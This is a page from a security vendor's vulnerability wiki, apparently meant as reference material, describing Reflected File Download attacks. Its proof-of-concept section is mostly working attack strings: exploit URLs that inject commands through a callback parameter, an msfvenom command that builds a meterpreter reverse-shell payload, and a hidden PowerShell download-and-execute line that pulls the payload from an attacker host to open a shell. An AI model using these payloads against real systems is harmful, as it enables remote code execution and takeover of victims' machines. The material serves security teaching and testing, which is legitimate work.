Cobalt Logo
Menu Icon

Cobalt Vulnerability Wiki

Cobalt Vulnerability Wiki

Categories

Toggle Arrow IconV2 - AuthenticationToggle Arrow IconV3 - Session ManagementToggle Arrow IconV4 - Access ControlToggle Arrow IconV5 - Validation/Sanitization
Blind SQL injectionClickjackingCommand Injection Cookie-Based XSS Cross Site Script Inclusion (XSSI)CSRF/URL-Based XSS CSS injectionCSV Injection DOM-Based XSSFlash-Based XSS HTML injection HTTP Parameter Pollution to XSS HTTP Request Smuggling HTTP Response Splitting (CRLF)iframe InjectionLDAP injection Local File InclusionOOB (Out of Band) XXEOpen Redirect Reflected File Download (RFD) Reflected Self-XSSReflected XSS Reflected XSS - WAF bypassRemote Code ExecutionRemote File InclusionRosetta FlashServer Side Template InjectionServer Side Template Injection (SSTI) in Flask SQL Injection SSI InjectionSSRF Stored XSSTabnabbing TRACE Method XSS - Cross-Site Tracing (XST) Universal (UXSS) XSS WAF Bypass XSS via RefererXXE
Toggle Arrow IconV6 - CryptographyToggle Arrow IconV7 - Error LoggingToggle Arrow IconV8 - Data ProtectionToggle Arrow IconV9 - CommunicationsToggle Arrow IconV10 - Malicious CodeToggle Arrow IconV11 - Business LogicToggle Arrow IconV12 - Files ResourcesToggle Arrow IconV13 - APIToggle Arrow IconV14 - Config
Arrow Left

V5 - Validation/Sanitization

Reflected File Download (RFD)

POC


Here are some of the commands you can try to exploit this vulnerability:



https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=rfd\"||calc||



https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World’);



https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World’);var command = “Calc.exe”;var WshShell = WScript.CreateObject(“WScript.Shell”);WshShell.Run(command);



Create meterpreter payload msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=attackerip LPORT=4444 -f psh -o meterpreter-payload.txt



https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World’);var command = “powershell -ep bypass -NoExit -w hidden IEX (New-Object System.Net.Webclient).DownloadString(‘http://attackerip:8080/meterpreter-payload.txt')”;var WshShell = WScript.CreateObject(“WScript.Shell”);WshShell.Run(command);



You’ll get a shell on the server




Impact

Very High (when a shell session obtained)



Likelihood

Very High (when a shell session obtained)


Ready to get started?

our platformschedule a demo
Aircall logoAlgolia logoCangageCredit KarmaDattoEgnyteHubspotMovinimageMulesoftPendoSentaraSmarshSnowSolarisTalkdeskVerifoneKubraAxel SpringerNuna

Join some of these great clients we're proud to have helped